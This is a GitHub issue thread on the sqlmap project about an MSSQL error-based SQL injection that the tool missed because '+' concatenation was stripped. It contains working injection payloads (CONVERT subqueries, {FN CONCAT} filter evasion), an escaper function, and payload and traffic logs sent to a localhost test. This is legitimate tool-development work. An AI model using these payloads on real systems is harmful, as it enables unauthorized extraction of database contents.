### ISSUE TITLE
Add support for subquery, non-blind in error response

### ISSUE THREAD

**Issue by mbrancato** [sqlmapproject/sqlmap#2396]
## What's the problem (or question)?
I noticed that sqlmap missed an injection in MSSQL where the query looked like the following:

`select name from table where id = %field%;` where the result (name, etc) is not returned to the user.

Even pointing out the correct parameter, it couldn't identify the injection. Also, there is the ability for a blind injection here as well which sqlmap missed.

## Do you have an idea for a solution?
Sorry, I'm not familiar with the sqlmap tamper structure or I would attempt an edit and PR.

A working tamper would be to return the result in the error message of a subquery such as 

`(select convert(int,(%QUERY%)) from syscolumns)`

Additionally, detecting the blind injection with time-based queries should be rather easy.

Hope this helps. Good luck.

**Comment by stamparm** [comment]
Those are supported. Please use higher level (--level). Also, use -v 3 to
see those same payloads

**Comment by mbrancato** [comment]
This doesn't seem to be supported even when marking the injection location with *.

To be fair, I used `--level==5 --risk=3` and it still failed

**Comment by stamparm** [comment]
Please give me a command you are using and the payload that you are
expecting. Watch the current payloads with -v 3. I am pretty sure that you
are missing something

On Feb 14, 2017 5:18 PM, "Mike Brancato" <notifications@github.com> wrote:

This doesn't seem to be supported even when marking the injection location
with *.

To be fair, I used --level==5 --risk=3 and it still failed

—
You are receiving this because you were assigned.

Reply to this email directly, view it on GitHub
<https://github.com/sqlmapproject/sqlmap/issues/2396#issuecomment-279754891>,
or mute the thread

**Comment by stamparm** [comment]
p.s. CONVERT is a primitive payload supported by sqlmap for ages. You are
the first one nagging about it not being supported.

**Comment by mbrancato** [comment]
You are right, CONVERT works. I did a bit more searching on this and the reason that sqlmap cannot identify it is due to concatenation. The tartget DB  (MSSQL 2008 R2) has `+` concatenation disabled somehow(verified by hand), and sqlmap doesn't seem to support the {FN CONCAT(a,b)} in the escaper.

So I started messing around...

I've locally modified the escaper in syntax.py  and a working test case in error_based.xml and it seems to be sending working payloads, the response isn't being picked up by sqlmap as injectable.

For example:
`
[14:59:00] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace'
[14:59:00] [PAYLOAD] (CONVERT(INT,(SELECT {FN CONCAT({FN CONCAT(CHAR(113),{FN CONCAT(CHAR(120),{FN CONCAT(CHAR(113),{FN CONCAT(CHAR(122),CHAR(113))})})})},{FN CONCAT((SELECT (CASE WHEN (5073=5073) THEN CHAR(49) ELSE CHAR(48) END)),{FN CONCAT(CHAR(113),{FN CONCAT(CHAR(107),{FN CONCAT(CHAR(113),{FN CONCAT(CHAR(118),CHAR(113))})})})})})})))
`

The server responds like
`Conversion failed when converting the varchar value 'qjkqq1qjbjq' to data type int.`

I know modifying the escaper is a big deal, and the test cases all have hard-coded concatenations. But any suggestions would be helpful.

I've provided my code below just to help for future reference:
```
def escaper(value):
  if (len(value) < 2):
    if (ord(value) < 256):
      return("CHAR(%d)" % ord(value))
    else:
      return("NCHAR(%d)" % ord(value))
  if (ord(value[0]) < 256):
    return("{FN CONCAT(CHAR(%d),%s)}" % (ord(value[0]),escaper(value[1:])))
  else:
    return("{FN CONCAT(NCHAR(%d),%s)}" % (ord(value[0]),escaper(value[1:])))
```

**Comment by mbrancato** [comment]
FYI, I checked with the devs, but best we can figure right now the "+" is being stripped. So the {FN CONCAT()} method still seems reasonable.

**Comment by stamparm** [comment]
FYI - `--tamper=plus2concat`

**Comment by mbrancato** [comment]
This is a pre-2012 server, so CONCAT() is not supported, but {FN CONCAT()} is supported. Thanks for pointing me this direction.

**Comment by mbrancato** [comment]
FYI, I tried using the tamper, but the payloads do not appear to be "tampered" and still use "+"

e.g.
` AND 6740 IN (SELECT (CHAR(113)+CHAR(120)+CHAR(112)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (6740=6740) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(107)+CHAR(113)))`

```
10:17:35] [DEBUG] cleaning up configuration parameters
[10:17:35] [INFO] loading tamper script 'plus2concat'
...
[10:17:37] [PAYLOAD]  AND 6740 IN (SELECT (CHAR(113)+CHAR(120)+CHAR(112)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (6740=6740) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(107)+CHAR(113)))
[10:17:37] [TRAFFIC OUT] HTTP request [#7]:
POST / HTTP/1.1
Host: localhost:8000
Accept-encoding: gzip,deflate
Cache-control: no-cache
Content-type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
User-agent: sqlmap/1.1.2#stable (http://sqlmap.org)
Content-length: 313
Connection: close

id=%20AND%206740%20IN%20%28SELECT%20%28CHAR%28113%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%28122%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%286740%3D6740%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28113%29%29%29
```

**Comment by stamparm** [comment]
FYI, it is fixed with the latest revision (`1.1.2.9#dev`)

p.s. who uses `FYI` anymore?

**Comment by mbrancato** [comment]
heh. I'm just glad this resulted in an issue that helps.

Mind if I submit a PR for `{FN CONCAT()}` as a tamper to support pre-2012?

**Comment by stamparm** [comment]
@mbrancato added with the latest commit
